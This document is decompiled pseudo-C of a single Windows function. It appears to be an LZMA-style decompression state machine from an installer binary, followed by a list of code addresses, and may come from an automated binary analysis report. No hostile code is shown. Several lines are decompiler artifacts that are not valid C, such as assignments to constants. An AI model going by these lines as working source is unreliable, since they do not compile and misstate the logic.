                                        				signed int _v128;
                                        				signed int _v132;
                                        				signed int _v136;
                                        				void _v140;
                                        				void* _v148;
                                        				signed int _t537;
                                        				signed int _t538;
                                        				signed int _t572;
                                        
                                        				_t572 = 0x22;
                                        				_v148 = __ecx;
                                        				memcpy( &_v140, __ecx, _t572 << 2);
                                        				if(_v52 == 0xffffffff) {
                                        					return 1;
                                        				}
                                        				while(1) {
                                        					L3:
                                        					_t537 = _v140;
                                        					if(_t537 > 0x1c) {
                                        						break;
                                        					}
                                        					switch( *((intOrPtr*)(_t537 * 4 +  &M00406F09))) {
                                        						case 0:
                                        							__eflags = _v112;
                                        							if(_v112 == 0) {
                                        								goto L173;
                                        							}
                                        							_v112 = _v112 - 1;
                                        							_v116 = _v116 + 1;
                                        							_t537 =  *_v116;
                                        							__eflags = _t537 - 0xe1;
                                        							if(_t537 > 0xe1) {
                                        								goto L174;
                                        							}
                                        							_t542 = _t537 & 0x000000ff;
                                        							_push(0x2d);
                                        							asm("cdq");
                                        							_pop(_t576);
                                        							_push(9);
                                        							_pop(_t577);
                                        							_t622 = _t542 / _t576;
                                        							_t544 = _t542 % _t576 & 0x000000ff;
                                        							asm("cdq");
                                        							_t617 = _t544 % _t577 & 0x000000ff;
                                        							_v64 = _t617;
                                        							_v32 = (1 << _t622) - 1;
                                        							_v28 = (1 << _t544 / _t577) - 1;
                                        							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                        							__eflags = 0x600 - _v124;
                                        							if(0x600 == _v124) {
                                        								L12:
                                        								__eflags = _t625;
                                        								if(_t625 == 0) {
                                        									L14:
                                        									_v76 = _v76 & 0x00000000;
                                        									_v68 = _v68 & 0x00000000;
                                        									goto L17;
                                        								} else {
                                        									goto L13;
                                        								}
                                        								do {
                                        									L13:
                                        									_t625 = _t625 - 1;
                                        									__eflags = _t625;
                                        									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                        								} while (_t625 != 0);
                                        								goto L14;
                                        							}
                                        							__eflags = _v8;
                                        							if(_v8 != 0) {
                                        								GlobalFree(_v8); // executed
                                        							}
                                        							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                        							__eflags = _t537;
                                        							_v8 = _t537;
                                        							if(_t537 == 0) {
                                        								goto L174;
                                        							} else {
                                        								_v124 = 0x600;
                                        								goto L12;
                                        							}
                                        						case 1:
                                        							L15:
                                        							__eflags = _v112;
                                        							if(_v112 == 0) {
                                        								_v140 = 1;
                                        								goto L173;
                                        							}
                                        							_v112 = _v112 - 1;
                                        							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                        							_v116 = _v116 + 1;
                                        							_t50 =  &_v76;
                                        							 *_t50 = _v76 + 1;
                                        							__eflags =  *_t50;
                                        							L17:
                                        							__eflags = _v76 - 4;
                                        							if(_v76 < 4) {
                                        								goto L15;
                                        							}
                                        							_t550 = _v68;
                                        							__eflags = _t550 - _v120;
                                        							if(_t550 == _v120) {
                                        								L22:
                                        								_v76 = 5;
                                        								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                        								goto L25;
                                        							}
                                        							__eflags = _v12;
                                        							_v120 = _t550;
                                        							if(_v12 != 0) {
                                        								GlobalFree(_v12); // executed
                                        							}
                                        							_t537 = GlobalAlloc(0x40, _v68); // executed
                                        							__eflags = _t537;
                                        							_v12 = _t537;
                                        							if(_t537 == 0) {
                                        								goto L174;
                                        							} else {
                                        								goto L22;
                                        							}
                                        						case 2:
                                        							L26:
                                        							_t557 = _v100 & _v32;
                                        							_v136 = 6;
                                        							_v80 = _t557;
                                        							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                        							goto L135;
                                        						case 3:
                                        							L23:
                                        							__eflags = _v112;
                                        							if(_v112 == 0) {
                                        								_v140 = 3;
                                        								goto L173;
                                        							}
                                        							_v112 = _v112 - 1;
                                        							_t72 =  &_v116;
                                        							 *_t72 = _v116 + 1;
                                        							__eflags =  *_t72;
                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							L25:
                                        							_v76 = _v76 - 1;
                                        							__eflags = _v76;
                                        							if(_v76 != 0) {
                                        								goto L23;
                                        							}
                                        							goto L26;
                                        						case 4:
                                        							L136:
                                        							_t559 =  *_t626;
                                        							_t610 = _t559 & 0x0000ffff;
                                        							_t591 = (_v20 >> 0xb) * _t610;
                                        							__eflags = _v16 - _t591;
                                        							if(_v16 >= _t591) {
                                        								_v20 = _v20 - _t591;
                                        								_v16 = _v16 - _t591;
                                        								_v68 = 1;
                                        								_t560 = _t559 - (_t559 >> 5);
                                        								__eflags = _t560;
                                        								 *_t626 = _t560;
                                        							} else {
                                        								_v20 = _t591;
                                        								_v68 = _v68 & 0x00000000;
                                        								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                        							}
                                        							__eflags = _v20 - 0x1000000;
                                        							if(_v20 >= 0x1000000) {
                                        								goto L142;
                                        							} else {
                                        								goto L140;
                                        							}
                                        						case 5:
                                        							L140:
                                        							__eflags = _v112;
                                        							if(_v112 == 0) {
                                        								_v140 = 5;
                                        								goto L173;
                                        							}
                                        							_v20 = _v20 << 8;
                                        							_v112 = _v112 - 1;
                                        							_t464 =  &_v116;
                                        							 *_t464 = _v116 + 1;
                                        							__eflags =  *_t464;
                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							L142:
                                        							_t561 = _v136;
                                        							goto L143;
                                        						case 6:
                                        							__edx = 0;
                                        							__eflags = _v68;
                                        							if(_v68 != 0) {
                                        								__eax = _v8;
                                        								__ecx = _v60;
                                        								_v56 = 1;
                                        								_v136 = 7;
                                        								__esi = _v8 + 0x180 + _v60 * 2;
                                        								goto L135;
                                        							}
                                        							__eax = _v96 & 0x000000ff;
                                        							__esi = _v100;
                                        							__cl = 8;
                                        							__cl = 8 - _v64;
                                        							__esi = _v100 & _v28;
                                        							__eax = (_v96 & 0x000000ff) >> 8;
                                        							__ecx = _v64;
                                        							__esi = (_v100 & _v28) << 8;
                                        							__ecx = _v8;
                                        							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                        							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                        							__eflags = _v60 - 4;
                                        							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                        							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                        							if(_v60 >= 4) {
                                        								__eflags = _v60 - 0xa;
                                        								if(_v60 >= 0xa) {
                                        									_t103 =  &_v60;
                                        									 *_t103 = _v60 - 6;
                                        									__eflags =  *_t103;
                                        								} else {
                                        									_v60 = _v60 - 3;
                                        								}
                                        							} else {
                                        								_v60 = 0;
                                        							}
                                        							__eflags = _v56 - __edx;
                                        							if(_v56 == __edx) {
                                        								__ebx = 0;
                                        								__ebx = 1;
                                        								goto L63;
                                        							}
                                        							__eax = _v24;
                                        							__eax = _v24 - _v48;
                                        							__eflags = __eax - _v120;
                                        							if(__eax >= _v120) {
                                        								__eax = __eax + _v120;
                                        								__eflags = __eax;
                                        							}
                                        							__ecx = _v12;
                                        							__ebx = 0;
                                        							__ebx = 1;
                                        							__al =  *((intOrPtr*)(__eax + __ecx));
                                        							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                        							goto L43;
                                        						case 7:
                                        							__eflags = _v68 - 1;
                                        							if(_v68 != 1) {
                                        								__eax = _v40;
                                        								_v132 = 0x16;
                                        								_v36 = _v40;
                                        								__eax = _v44;
                                        								_v40 = _v44;
                                        								__eax = _v48;
                                        								_v44 = _v48;
                                        								__eax = 0;
                                        								__eflags = _v60 - 7;
                                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        								__al = __al & 0x000000fd;
                                        								__eax = (__eflags >= 0) - 1 + 0xa;
                                        								_v60 = (__eflags >= 0) - 1 + 0xa;
                                        								__eax = _v8;
                                        								__eax = _v8 + 0x664;
                                        								__eflags = __eax;
                                        								_v92 = __eax;
                                        								goto L71;
                                        							}
                                        							__eax = _v8;
                                        							__ecx = _v60;
                                        							_v136 = 8;
                                        							__esi = _v8 + 0x198 + _v60 * 2;
                                        							goto L135;
                                        						case 8:
                                        							__eflags = _v68;
                                        							if(_v68 != 0) {
                                        								__eax = _v8;
                                        								__ecx = _v60;
                                        								_v136 = 0xa;
                                        								__esi = _v8 + 0x1b0 + _v60 * 2;
                                        							} else {
                                        								__eax = _v60;
                                        								__ecx = _v8;
                                        								__eax = _v60 + 0xf;
                                        								_v136 = 9;
                                        								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                        								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                        							}
                                        							goto L135;
                                        						case 9:
                                        							__eflags = _v68;
                                        							if(_v68 != 0) {
                                        								goto L92;
                                        							}
                                        							__eflags = _v100;
                                        							if(_v100 == 0) {
                                        								goto L174;
                                        							}
                                        							__eax = 0;
                                        							__eflags = _v60 - 7;
                                        							_t264 = _v60 - 7 >= 0;
                                        							__eflags = _t264;
                                        							0 | _t264 = _t264 + _t264 + 9;
                                        							_v60 = _t264 + _t264 + 9;
                                        							goto L78;
                                        						case 0xa:
                                        							__eflags = _v68;
                                        							if(_v68 != 0) {
                                        								__eax = _v8;
                                        								__ecx = _v60;
                                        								_v136 = 0xb;
                                        								__esi = _v8 + 0x1c8 + _v60 * 2;
                                        								goto L135;
                                        							}
                                        							__eax = _v44;
                                        							goto L91;
                                        						case 0xb:
                                        							__eflags = _v68;
                                        							if(_v68 != 0) {
                                        								__ecx = _v40;
                                        								__eax = _v36;
                                        								_v36 = _v40;
                                        							} else {
                                        								__eax = _v40;
                                        							}
                                        							__ecx = _v44;
                                        							_v40 = _v44;
                                        							L91:
                                        							__ecx = _v48;
                                        							_v48 = __eax;
                                        							_v44 = _v48;
                                        							L92:
                                        							__eax = _v8;
                                        							_v132 = 0x15;
                                        							__eax = _v8 + 0xa68;
                                        							_v92 = _v8 + 0xa68;
                                        							goto L71;
                                        						case 0xc:
                                        							L102:
                                        							__eflags = _v112;
                                        							if(_v112 == 0) {
                                        								_v140 = 0xc;
                                        								goto L173;
                                        							}
                                        							__ecx = _v116;
                                        							__eax = _v16;
                                        							_v20 = _v20 << 8;
                                        							__ecx =  *_v116 & 0x000000ff;
                                        							_v112 = _v112 - 1;
                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							_t340 =  &_v116;
                                        							 *_t340 = _v116 + 1;
                                        							__eflags =  *_t340;
                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							__eax = _v48;
                                        							goto L104;
                                        						case 0xd:
                                        							L39:
                                        							__eflags = _v112;
                                        							if(_v112 == 0) {
                                        								_v140 = 0xd;
                                        								goto L173;
                                        							}
                                        							__ecx = _v116;
                                        							__eax = _v16;
                                        							_v20 = _v20 << 8;
                                        							__ecx =  *_v116 & 0x000000ff;
                                        							_v112 = _v112 - 1;
                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							_t127 =  &_v116;
                                        							 *_t127 = _v116 + 1;
                                        							__eflags =  *_t127;
                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							L41:
                                        							__eax = _v68;
                                        							__eflags = _v76 - _v68;
                                        							if(_v76 != _v68) {
                                        								goto L50;
                                        							}
                                        							__eflags = __ebx - 0x100;
                                        							if(__ebx >= 0x100) {
                                        								goto L56;
                                        							}
                                        							L43:
                                        							__eax = _v95 & 0x000000ff;
                                        							_v95 = _v95 << 1;
                                        							__ecx = _v92;
                                        							__eax = (_v95 & 0x000000ff) >> 7;
                                        							_v76 = __eax;
                                        							__eax = __eax + 1;
                                        							__eax = __eax << 8;
                                        							__eax = __eax + __ebx;
                                        							__esi = _v92 + __eax * 2;
                                        							_v20 = _v20 >> 0xb;
                                        							__ax =  *__esi;
                                        							_v88 = __esi;
                                        							__edx = __ax & 0x0000ffff;
                                        							__ecx = (_v20 >> 0xb) * __edx;
                                        							__eflags = _v16 - __ecx;
                                        							if(_v16 >= __ecx) {
                                        								_v20 = _v20 - __ecx;
                                        								_v16 = _v16 - __ecx;
                                        								__cx = __ax;
                                        								_v68 = 1;
                                        								__cx = __ax >> 5;
                                        								__eflags = __eax;
                                        								__ebx = __ebx + __ebx + 1;
                                        								 *__esi = __ax;
                                        							} else {
                                        								_v68 = _v68 & 0x00000000;
                                        								_v20 = __ecx;
                                        								0x800 = 0x800 - __edx;
                                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                        								__ebx = __ebx + __ebx;
                                        								 *__esi = __cx;
                                        							}
                                        							__eflags = _v20 - 0x1000000;
                                        							_v72 = __ebx;
                                        							if(_v20 >= 0x1000000) {
                                        								goto L41;
                                        							} else {
                                        								goto L39;
                                        							}
                                        						case 0xe:
                                        							L48:
                                        							__eflags = _v112;
                                        							if(_v112 == 0) {
                                        								_v140 = 0xe;
                                        								goto L173;
                                        							}
                                        							__ecx = _v116;
                                        							__eax = _v16;
                                        							_v20 = _v20 << 8;
                                        							__ecx =  *_v116 & 0x000000ff;
                                        							_v112 = _v112 - 1;
                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							_t161 =  &_v116;
                                        							 *_t161 = _v116 + 1;
                                        							__eflags =  *_t161;
                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							while(1) {
                                        								L50:
                                        								__eflags = __ebx - 0x100;
                                        								if(__ebx >= 0x100) {
                                        									break;
                                        								}
                                        								__eax = _v92;
                                        								__edx = __ebx + __ebx;
                                        								__ecx = _v20;
                                        								__esi = __edx + __eax;
                                        								__ecx = _v20 >> 0xb;
                                        								__ax =  *__esi;
                                        								_v88 = __esi;
                                        								__edi = __ax & 0x0000ffff;
                                        								__ecx = (_v20 >> 0xb) * __edi;
                                        								__eflags = _v16 - __ecx;
                                        								if(_v16 >= __ecx) {
                                        									_v20 = _v20 - __ecx;
                                        									_v16 = _v16 - __ecx;
                                        									__cx = __ax;
                                        									_t175 = __edx + 1; // 0x1
                                        									__ebx = _t175;
                                        									__cx = __ax >> 5;
                                        									__eflags = __eax;
                                        									 *__esi = __ax;
                                        								} else {
                                        									_v20 = __ecx;
                                        									0x800 = 0x800 - __edi;
                                        									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        									__ebx = __ebx + __ebx;
                                        									 *__esi = __cx;
                                        								}
                                        								__eflags = _v20 - 0x1000000;
                                        								_v72 = __ebx;
                                        								if(_v20 >= 0x1000000) {
                                        									continue;
                                        								} else {
                                        									goto L48;
                                        								}
                                        							}
                                        							L56:
                                        							_t178 =  &_v56;
                                        							 *_t178 = _v56 & 0x00000000;
                                        							__eflags =  *_t178;
                                        							goto L57;
                                        						case 0xf:
                                        							L60:
                                        							__eflags = _v112;
                                        							if(_v112 == 0) {
                                        								_v140 = 0xf;
                                        								goto L173;
                                        							}
                                        							__ecx = _v116;
                                        							__eax = _v16;
                                        							_v20 = _v20 << 8;
                                        							__ecx =  *_v116 & 0x000000ff;
                                        							_v112 = _v112 - 1;
                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							_t208 =  &_v116;
                                        							 *_t208 = _v116 + 1;
                                        							__eflags =  *_t208;
                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							L62:
                                        							__eflags = __ebx - 0x100;
                                        							if(__ebx >= 0x100) {
                                        								L57:
                                        								__al = _v72;
                                        								_v96 = _v72;
                                        								goto L58;
                                        							}
                                        							L63:
                                        							__eax = _v92;
                                        							__edx = __ebx + __ebx;
                                        							__ecx = _v20;
                                        							__esi = __edx + __eax;
                                        							__ecx = _v20 >> 0xb;
                                        							__ax =  *__esi;
                                        							_v88 = __esi;
                                        							__edi = __ax & 0x0000ffff;
                                        							__ecx = (_v20 >> 0xb) * __edi;
                                        							__eflags = _v16 - __ecx;
                                        							if(_v16 >= __ecx) {
                                        								_v20 = _v20 - __ecx;
                                        								_v16 = _v16 - __ecx;
                                        								__cx = __ax;
                                        								_t222 = __edx + 1; // 0x1
                                        								__ebx = _t222;
                                        								__cx = __ax >> 5;
                                        								__eflags = __eax;
                                        								 *__esi = __ax;
                                        							} else {
                                        								_v20 = __ecx;
                                        								0x800 = 0x800 - __edi;
                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        								__ebx = __ebx + __ebx;
                                        								 *__esi = __cx;
                                        							}
                                        							__eflags = _v20 - 0x1000000;
                                        							_v72 = __ebx;
                                        							if(_v20 >= 0x1000000) {
                                        								goto L62;
                                        							} else {
                                        								goto L60;
                                        							}
                                        						case 0x10:
                                        							L112:
                                        							__eflags = _v112;
                                        							if(_v112 == 0) {
                                        								_v140 = 0x10;
                                        								goto L173;
                                        							}
                                        							__ecx = _v116;
                                        							__eax = _v16;
                                        							_v20 = _v20 << 8;
                                        							__ecx =  *_v116 & 0x000000ff;
                                        							_v112 = _v112 - 1;
                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							_t371 =  &_v116;
                                        							 *_t371 = _v116 + 1;
                                        							__eflags =  *_t371;
                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							goto L114;
                                        						case 0x11:
                                        							L71:
                                        							__esi = _v92;
                                        							_v136 = 0x12;
                                        							goto L135;
                                        						case 0x12:
                                        							__eflags = _v68;
                                        							if(_v68 != 0) {
                                        								__eax = _v92;
                                        								_v136 = 0x13;
                                        								__esi = _v92 + 2;
                                        								L135:
                                        								_v88 = _t626;
                                        								goto L136;
                                        							}
                                        							__eax = _v80;
                                        							_v52 = _v52 & 0x00000000;
                                        							__ecx = _v92;
                                        							__eax = _v80 << 4;
                                        							__eflags = __eax;
                                        							__eax = _v92 + __eax + 4;
                                        							goto L133;
                                        						case 0x13:
                                        							__eflags = _v68;
                                        							if(_v68 != 0) {
                                        								_t475 =  &_v92;
                                        								 *_t475 = _v92 + 0x204;
                                        								__eflags =  *_t475;
                                        								_v52 = 0x10;
                                        								_v68 = 8;
                                        								L147:
                                        								_v128 = 0x14;
                                        								goto L148;
                                        							}
                                        							__eax = _v80;
                                        							__ecx = _v92;
                                        							__eax = _v80 << 4;
                                        							_v52 = 8;
                                        							__eax = _v92 + (_v80 << 4) + 0x104;
                                        							L133:
                                        							_v92 = __eax;
                                        							_v68 = 3;
                                        							goto L147;
                                        						case 0x14:
                                        							_v52 = _v52 + __ebx;
                                        							__eax = _v132;
                                        							goto L143;
                                        						case 0x15:
                                        							__eax = 0;
                                        							__eflags = _v60 - 7;
                                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                        							__al = __al & 0x000000fd;
                                        							__eax = (__eflags >= 0) - 1 + 0xb;
                                        							_v60 = (__eflags >= 0) - 1 + 0xb;
                                        							goto L123;
                                        						case 0x16:
                                        							__eax = _v52;
                                        							__eflags = __eax - 4;
                                        							if(__eax >= 4) {
                                        								_push(3);
                                        								_pop(__eax);
                                        							}
                                        							__ecx = _v8;
                                        							_v68 = 6;
                                        							__eax = __eax << 7;
                                        							_v128 = 0x19;
                                        							_v92 = __eax;
                                        							goto L148;
                                        						case 0x17:
                                        							L148:
                                        							__eax = _v68;
                                        							_v84 = 1;
                                        							_v76 = _v68;
                                        							goto L152;
                                        						case 0x18:
                                        							L149:
                                        							__eflags = _v112;
                                        							if(_v112 == 0) {
                                        								_v140 = 0x18;
                                        								goto L173;
                                        							}
                                        							__ecx = _v116;
                                        							__eax = _v16;
                                        							_v20 = _v20 << 8;
                                        							__ecx =  *_v116 & 0x000000ff;
                                        							_v112 = _v112 - 1;
                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							_t490 =  &_v116;
                                        							 *_t490 = _v116 + 1;
                                        							__eflags =  *_t490;
                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                        							L151:
                                        							_t493 =  &_v76;
                                        							 *_t493 = _v76 - 1;
                                        							__eflags =  *_t493;
                                        							L152:
                                        							__eflags = _v76;
                                        							if(_v76 <= 0) {
                                        								__ecx = _v68;
                                        								__ebx = _v84;
                                        								0 = 1;
                                        								__eax = 1 << __cl;
                                        								__ebx = _v84 - (1 << __cl);
                                        								__eax = _v128;
                                        								_v72 = __ebx;
                                        								L143:
                                        								_v140 = _t561;
                                        								goto L3;
                                        							}
                                        							__eax = _v84;
                                        							_v20 = _v20 >> 0xb;
                                        							__edx = _v84 + _v84;
                                        							__eax = _v92;
                                        							__esi = __edx + __eax;
                                        							_v88 = __esi;
                                        							__ax =  *__esi;
                                        							__edi = __ax & 0x0000ffff;
                                        							__ecx = (_v20 >> 0xb) * __edi;
                                        							__eflags = _v16 - __ecx;
                                        							if(_v16 >= __ecx) {
                                        								_v20 = _v20 - __ecx;
                                        								_v16 = _v16 - __ecx;
                                        								__cx = __ax;
                                        								__cx = __ax >> 5;
                                        								__eax = __eax - __ecx;
                                        								__edx = __edx + 1;
                                        								__eflags = __edx;
                                        								 *__esi = __ax;
                                        								_v84 = __edx;
                                        							} else {
                                        								_v20 = __ecx;
                                        								0x800 = 0x800 - __edi;
                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                        								_v84 = _v84 << 1;
                                        								 *__esi = __cx;
                                        							}
                                        							__eflags = _v20 - 0x1000000;
                                        							if(_v20 >= 0x1000000) {
                                        								goto L151;
                                        							} else {
                                        								goto L149;
                                        							}
                                        						case 0x19:
                                        							__eflags = __ebx - 4;
                                        							if(__ebx < 4) {
                                        								_v48 = __ebx;
                                        								L122:
                                        								_t399 =  &_v48;
                                        								 *_t399 = _v48 + 1;
                                        								__eflags =  *_t399;
                                        								L123:
                                        								__eax = _v48;
                                        								__eflags = __eax;
                                        								if(__eax == 0) {
                                        									_v52 = _v52 | 0xffffffff;
                                        									goto L173;
                                        								}
                                        								__eflags = __eax - _v100;
                                        								if(__eax > _v100) {
                                        									goto L174;
                                        								}
                                        								_v52 = _v52 + 2;
                                        								__eax = _v52;
                                        								_t406 =  &_v100;
                                        								 *_t406 = _v100 + _v52;
                                        								__eflags =  *_t406;
                                        								goto L126;
                                        							}
                                        							__ecx = __ebx;
                                        							__eax = __ebx;
                                        							__ecx = __ebx >> 1;
                                        							__eax = __ebx & 0x00000001;
                                        							__ecx = (__ebx >> 1) - 1;
                                        							__al = __al | 0x00000002;
                                        							__eax = (__ebx & 0x00000001) << __cl;
                                        							__eflags = __ebx - 0xe;
                                        							_v48 = __eax;
                                        							if(__ebx >= 0xe) {
                                        								__ebx = 0;
                                        								_v76 = __ecx;
                                        								L105:
                                        								__eflags = _v76;
                                        								if(_v76 <= 0) {
                                        									__eax = __eax + __ebx;
                                        									_v68 = 4;
                                        									_v48 = __eax;
                                        									__eax = _v8;
                                        									__eax = _v8 + 0x644;
                                        									__eflags = __eax;
                                        									L111:
                                        									__ebx = 0;
                                        									_v92 = __eax;
                                        									_v84 = 1;
                                        									_v72 = 0;
                                        									_v76 = 0;
                                        									L115:
                                        									__eax = _v68;
                                        									__eflags = _v76 - _v68;
                                        									if(_v76 >= _v68) {
                                        										_t397 =  &_v48;
                                        										 *_t397 = _v48 + __ebx;
                                        										__eflags =  *_t397;
                                        										goto L122;
                                        									}
                                        									__eax = _v84;
                                        									_v20 = _v20 >> 0xb;
                                        									__edi = _v84 + _v84;
                                        									__eax = _v92;
                                        									__esi = __edi + __eax;
                                        									_v88 = __esi;
                                        									__ax =  *__esi;
                                        									__ecx = __ax & 0x0000ffff;
                                        									__edx = (_v20 >> 0xb) * __ecx;
                                        									__eflags = _v16 - __edx;
                                        									if(_v16 >= __edx) {
                                        										__ecx = 0;
                                        										_v20 = _v20 - __edx;
                                        										__ecx = 1;
                                        										_v16 = _v16 - __edx;
                                        										__ebx = 1;
                                        										__ecx = _v76;
                                        										__ebx = 1 << __cl;
                                        										__ecx = 1 << __cl;
                                        										__ebx = _v72;
                                        										__ebx = _v72 | __ecx;
                                        										__cx = __ax;
                                        										__cx = __ax >> 5;
                                        										__eax = __eax - __ecx;
                                        										__edi = __edi + 1;
                                        										__eflags = __edi;
                                        										_v72 = __ebx;
                                        										 *__esi = __ax;
                                        										_v84 = __edi;
                                        									} else {
                                        										_v20 = __edx;
                                        										0x800 = 0x800 - __ecx;
                                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                        										_v84 = _v84 << 1;
                                        										 *__esi = __dx;
                                        									}
                                        									__eflags = _v20 - 0x1000000;
                                        									if(_v20 >= 0x1000000) {
                                        										L114:
                                        										_t374 =  &_v76;
                                        										 *_t374 = _v76 + 1;
                                        										__eflags =  *_t374;
                                        										goto L115;
                                        									} else {
                                        										goto L112;
                                        									}
                                        								}
                                        								__ecx = _v16;
                                        								__ebx = __ebx + __ebx;
                                        								_v20 = _v20 >> 1;
                                        								__eflags = _v16 - _v20;
                                        								_v72 = __ebx;
                                        								if(_v16 >= _v20) {
                                        									__ecx = _v20;
                                        									_v16 = _v16 - _v20;
                                        									__ebx = __ebx | 0x00000001;
                                        									__eflags = __ebx;
                                        									_v72 = __ebx;
                                        								}
                                        								__eflags = _v20 - 0x1000000;
                                        								if(_v20 >= 0x1000000) {
                                        									L104:
                                        									_t344 =  &_v76;
                                        									 *_t344 = _v76 - 1;
                                        									__eflags =  *_t344;
                                        									goto L105;
                                        								} else {
                                        									goto L102;
                                        								}
                                        							}
                                        							__edx = _v8;
                                        							__eax = __eax - __ebx;
                                        							_v68 = __ecx;
                                        							__eax = _v8 + 0x55e + __eax * 2;
                                        							goto L111;
                                        						case 0x1a:
                                        							L58:
                                        							__eflags = _v104;
                                        							if(_v104 == 0) {
                                        								_v140 = 0x1a;
                                        								goto L173;
                                        							}
                                        							__ecx = _v108;
                                        							__al = _v96;
                                        							__edx = _v12;
                                        							_v100 = _v100 + 1;
                                        							_v108 = _v108 + 1;
                                        							_v104 = _v104 - 1;
                                        							 *_v108 = __al;
                                        							__ecx = _v24;
                                        							 *(_v12 + __ecx) = __al;
                                        							__eax = __ecx + 1;
                                        							__edx = 0;
                                        							_t197 = __eax % _v120;
                                        							__eax = __eax / _v120;
                                        							__edx = _t197;
                                        							goto L82;
                                        						case 0x1b:
                                        							L78:
                                        							__eflags = _v104;
                                        							if(_v104 == 0) {
                                        								_v140 = 0x1b;
                                        								goto L173;
                                        							}
                                        							__eax = _v24;
                                        							__eax = _v24 - _v48;
                                        							__eflags = __eax - _v120;
                                        							if(__eax >= _v120) {
                                        								__eax = __eax + _v120;
                                        								__eflags = __eax;
                                        							}
                                        							__edx = _v12;
                                        							__cl =  *(__edx + __eax);
                                        							__eax = _v24;
                                        							_v96 = __cl;
                                        							 *(__edx + __eax) = __cl;
                                        							__eax = __eax + 1;
                                        							__edx = 0;
                                        							_t280 = __eax % _v120;
                                        							__eax = __eax / _v120;
                                        							__edx = _t280;
                                        							__eax = _v108;
                                        							_v100 = _v100 + 1;
                                        							_v108 = _v108 + 1;
                                        							_t289 =  &_v104;
                                        							 *_t289 = _v104 - 1;
                                        							__eflags =  *_t289;
                                        							 *_v108 = __cl;
                                        							L82:
                                        							_v24 = __edx;
                                        							goto L83;
                                        						case 0x1c:
                                        							while(1) {
                                        								L126:
                                        								__eflags = _v104;
                                        								if(_v104 == 0) {
                                        									break;
                                        								}
                                        								__eax = _v24;
                                        								__eax = _v24 - _v48;
                                        								__eflags = __eax - _v120;
                                        								if(__eax >= _v120) {
                                        									__eax = __eax + _v120;
                                        									__eflags = __eax;
                                        								}
                                        								__edx = _v12;
                                        								__cl =  *(__edx + __eax);
                                        								__eax = _v24;
                                        								_v96 = __cl;
                                        								 *(__edx + __eax) = __cl;
                                        								__eax = __eax + 1;
                                        								__edx = 0;
                                        								_t420 = __eax % _v120;
                                        								__eax = __eax / _v120;
                                        								__edx = _t420;
                                        								__eax = _v108;
                                        								_v108 = _v108 + 1;
                                        								_v104 = _v104 - 1;
                                        								_v52 = _v52 - 1;
                                        								__eflags = _v52;
                                        								 *_v108 = __cl;
                                        								_v24 = _t420;
                                        								if(_v52 > 0) {
                                        									continue;
                                        								} else {
                                        									L83:
                                        									_v140 = 2;
                                        									goto L3;
                                        								}
                                        							}
                                        							_v140 = 0x1c;
                                        							L173:
                                        							_push(0x22);
                                        							_pop(_t574);
                                        							memcpy(_v148,  &_v140, _t574 << 2);
                                        							return 0;
                                        					}
                                        				}
                                        				L174:
                                        				_t538 = _t537 | 0xffffffff;
                                        				return _t538;
                                        			}










































                                        0x004064c7
                                        0x004064ce
                                        0x004064d4
                                        0x004064da
                                        0x00000000
                                        0x004064de
                                        0x004064ea
                                        0x004064ea
                                        0x004064ea
                                        0x004064f3
                                        0x00000000
                                        0x00000000
                                        0x004064f9
                                        0x00000000
                                        0x00406500
                                        0x00406504
                                        0x00000000
                                        0x00000000
                                        0x0040650d
                                        0x00406510
                                        0x00406513
                                        0x00406515
                                        0x00406517
                                        0x00000000
                                        0x00000000
                                        0x0040651d
                                        0x00406520
                                        0x00406522
                                        0x00406523
                                        0x00406526
                                        0x00406528
                                        0x00406529
                                        0x0040652b
                                        0x0040652e
